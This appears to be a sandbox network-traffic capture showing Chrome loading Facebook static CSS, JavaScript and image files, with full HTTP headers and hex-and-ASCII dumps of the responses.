                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 33 30 30 76 77 20 2d 20 31 30 30 76 68 29 20 2f 20 32 20 2d 20 38 35 2e 37 37 76 77 29 20 2a 20 2d 31 29 2c 33 37 2e 39 37 76 77 20 63 61 6c 63 28 28 28 33 30 30 76 77 20 2d 20 31 30 30 76 68 29 20 2f 20 32 20 2d 20 38 35 2e 37 37 76 77 29 20 2a 20 2d 31 29 2c 2d 31 30 30 76 77 20 63 61 6c 63 28 28 28 33 30 30 76 77 20 2d 20 31 30 30 76 68 29 20 2f 20 32 20 2d 20 31 35 34 2e 35 36 76 77 29 20 2a 20 2d 31 29 2c 2d 31 30 30 76 77 20 63 61 6c 63 28 28 28 33 30 30 76 77 20 2d 20 31 30 30 76 68 29 20 2f 20 32 20 2d 20 31 35 34 2e 35 36 76 77 29 20 2a 20 2d 31 29 2c 2d 31 30 30 76 77 20 63 61 6c 63 28 28 28 33 30 30 76 77 20 2d 20 31 30 30 76 68 29 20 2f 20 32 20 2d 20 31 35 34 2e 35 36 76 77 29 20 2a 20 2d 31 29 2c 31 33 2e 33 34 76 77 20 63 61 6c 63 28 28 28
                                                                                                                                                                                                                                Data Ascii: 300vw - 100vh) / 2 - 85.77vw) * -1),37.97vw calc(((300vw - 100vh) / 2 - 85.77vw) * -1),-100vw calc(((300vw - 100vh) / 2 - 154.56vw) * -1),-100vw calc(((300vw - 100vh) / 2 - 154.56vw) * -1),-100vw calc(((300vw - 100vh) / 2 - 154.56vw) * -1),13.34vw calc(((


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                143192.168.2.450075157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC604OUTGET /rsrc.php/v3/yI/l/0,cross/TZbd1-PK_cx.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: /eBov0+gCAb1il1gDXbZ8Q==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 20:05:54 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: HYmpmpIaJmY1KKh+WBgvREgrlkaCD/m4EzFb14Q5IMrNa0vNY3oUubsOwwg76CWOQR55UJC1N0xt+QyMTzokhA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:01 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 24511
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC15879INData Raw: 5f 32 65 34 32 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 0a 2e 5f 61 6c 37 63 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 69 6e 73 65 74 3a 30 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 30 31 7d 2e 5f 61 6d 33 68 7b 69 6e 73 65 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 2e 5f 61 6c 37 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 2c 20 30 20 30 20 30 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 31
                                                                                                                                                                                                                                Data Ascii: _2e42{box-sizing:border-box}._al7c{align-items:center;display:flex;inset:0;justify-content:center;position:absolute;z-index:101}._am3h{inset:0;position:fixed}._al7d{background-color:#fff;box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC8631INData Raw: 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 46 50 72 6f 54 65 78 74 2d 52 65 67 75 6c 61 72 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 36 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 38 35 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 20 30 20 31 36 70 78 7d 2e 5f 39 6f 2d 72 20 2e 5f 39 6f 2d 75 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 38 37 37 66 32 3b 62 6f
                                                                                                                                                                                                                                Data Ascii: rder-radius:6px;color:#fff;flex-grow:1;font-family:SFProText-Regular, Helvetica, Arial, sans-serif;font-size:15px;height:36px;line-height:20px;margin-left:8px;margin-right:6px;min-width:185px;padding:0 16px 0 16px}._9o-r ._9o-u{background-color:#1877f2;bo


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                144192.168.2.450073157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC604OUTGET /rsrc.php/v3/yO/l/0,cross/KuH9BoeRDxR.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: PpRQQo1OvLuonMXbI/KEUQ==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 21:23:53 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: qy5srLJl6X2ikBF+yzOSD2HuDZ+c1JEJchrwv/VJtaOJ7qdqecoDwpvyksqSzfVsyWbRZKUcX2ykYz0ncMj6EQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:01 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=104, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 30222
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC15878INData Raw: 5f 33 38 76 6f 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 5f 36 30 35 61 20 2e 5f 33 38 76 6f 3a 6e 6f 74 28 2e 5f 31 78 32 5f 29 3a 61 66 74 65 72 2c 2e 5f 35 65 69 74 20 2e 5f 33 38 76 6f 3a 6e 6f 74 28 2e 5f 31 78 32 5f 29 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 2e 5f 36 30 35 61 20 2e 5f 37 6d 69 38 3a 6e 6f 74 28 2e 5f 31 78 32 5f 29 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 5f 33 38 76 6f 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 31 29 3b 62 6f 74 74 6f 6d 3a 30 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a
                                                                                                                                                                                                                                Data Ascii: _38vo{position:relative}._605a ._38vo:not(._1x2_):after,._5eit ._38vo:not(._1x2_):after{border-radius:50%}._605a ._7mi8:not(._1x2_):after{border-radius:8px}._38vo:after{border:1px solid rgba(0, 0, 0, .1);bottom:0;content:'';left:0;position:absolute;right:
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC14343INData Raw: 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 59 2f 72 2f 41 4d 6a 64 71 49 72 47 30 6c 4d 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 70 78 20 2d 31 39 30 70 78 7d 2e 68 69 67 68 43 6f 6e 74 72 61 73 74 20 2e 5f 35 36 5f 66 2e 5f 35 64 2d 33 2e 5f 35 64 7a 7a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 59 2f 72 2f 41 4d 6a 64 71 49 72 47 30 6c 4d 2e 70 6e 67 29 3b 6d 61 72 67 69 6e 3a 2d 39 30 70 78 20 30 20 30 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 68 69 67
                                                                                                                                                                                                                                Data Ascii: d-image:url(/rsrc.php/v3/yY/r/AMjdqIrG0lM.png);background-repeat:no-repeat;background-size:auto;background-position:1px -190px}.highContrast ._56_f._5d-3._5dzz:before{content:url(/rsrc.php/v3/yY/r/AMjdqIrG0lM.png);margin:-90px 0 0 0;position:absolute}.hig


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                145192.168.2.450076157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC592OUTGET /rsrc.php/v3ij9m4/yu/l/en_GB/GcN06huceZG.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: QmoEdxKJjJATQTphbhFIVg==
                                                                                                                                                                                                                                Expires: Wed, 24 Sep 2025 00:09:12 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: bcfBxnX8H0M1x3KvucKiIhJect0Cb76U0W5DV2XuCvk6hg9P+OCji//OfF1j39Us65Y++HCbLnYk5Ne5Zv27+w==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:02 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=109, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 48388
                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC15861INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 73 79 6e 63 44 4f 4d 22 2c 5b 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 46 42 4c 6f 67 67 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 69 6e 76 6f 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 65 5b 30 5d 2c 67 3d 65 5b 31 5d 2c 68 3d 65 5b 32 5d 3b 65 3d 65 5b 33 5d 3b 68 3d 68 26 26 63 7c 7c 6e 75 6c 6c 3b 67 26 26 28 68 3d 62 28 22 44 4f 4d 22 29 2e 73 63 72 79 28 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 67 29 5b 30 5d 29 3b 68 7c 7c 62 28 22 46 42 4c 6f 67 67 65 72 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger"
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC16384INData Raw: 65 20 64 69 73 70 6c 61 79 20 73 74 61 72 74 65 64 2e 20 54 68 69 73 20 69 73 20 61 20 6e 6f 2d 6f 70 2e 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 76 61 72 20 61 2c 62 3d 6e 65 77 28 63 28 22 44 65 66 65 72 72 65 64 22 29 29 28 29 3b 65 2e 70 75 73 68 28 62 2e 67 65 74 50 72 6f 6d 69 73 65 28 29 29 3b 72 65 74 75 72 6e 20 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 67 75 61 72 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 29 2c 62 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 44 69 73 70 6c 61 79 42 6c 6f 63 6b 69 6e 67 45 76 65 6e 74 22 2c 7b 70 72 6f 70 61 67 61 74 69 6f 6e 54 79 70 65 3a 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 50 72
                                                                                                                                                                                                                                Data Ascii: e display started. This is a no-op.");return function(){}}var a,b=new(c("Deferred"))();e.push(b.getPromise());return c("TimeSlice").guard(function(){a&&c("clearTimeout")(a),b.resolve()},"AsyncRequestDisplayBlockingEvent",{propagationType:c("TimeSlice").Pr
                                                                                                                                                                                                                                2024-09-29 04:55:03 UTC16142INData Raw: 65 61 72 63 68 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 74 68 69 73 2e 75 72 69 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 68 69 73 2e 75 72 69 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 2f 2e 2e 2f 22 29 7c 7c 74 68 69 73 2e 75 72 69 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 5c 5c 2e 2e 2f 22 29 7c 7c 74 68 69 73 2e 75 72 69 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 2f 2e 2e 5c 5c 22 29 7c 7c 74 68 69 73 2e 75 72 69 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 5c 5c 2e 2e 5c 5c 22 29 29 72 65 74 75 72 6e 21 31 3b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 68 69 73 2e 64 61 74 61 2c 63 28 22 67 65 74 41 73
                                                                                                                                                                                                                                Data Ascii: earch.toString().includes(this.uri.toString()))return!1;if(this.uri.toString().includes("/../")||this.uri.toString().includes("\\../")||this.uri.toString().includes("/..\\")||this.uri.toString().includes("\\..\\"))return!1;Object.assign(this.data,c("getAs


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                146192.168.2.450062157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC654OUTGET /rsrc.php/v3/yP/r/ZQxGeuP1tWI.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC1877INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: dR02ejCkPHRONI/PtMuSOw==
                                                                                                                                                                                                                                Expires: Wed, 17 Sep 2025 08:56:59 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: JX5nViq4LouXo0ENyFUSLD/AHfSWhHpWk4aXCWkM5hcBDsMrDF2ESX4pc771tWMs8Hqs+l755MmsZDQJax3PHg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:02 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=100, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 4185
                                                                                                                                                                                                                                2024-09-29 04:55:02 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
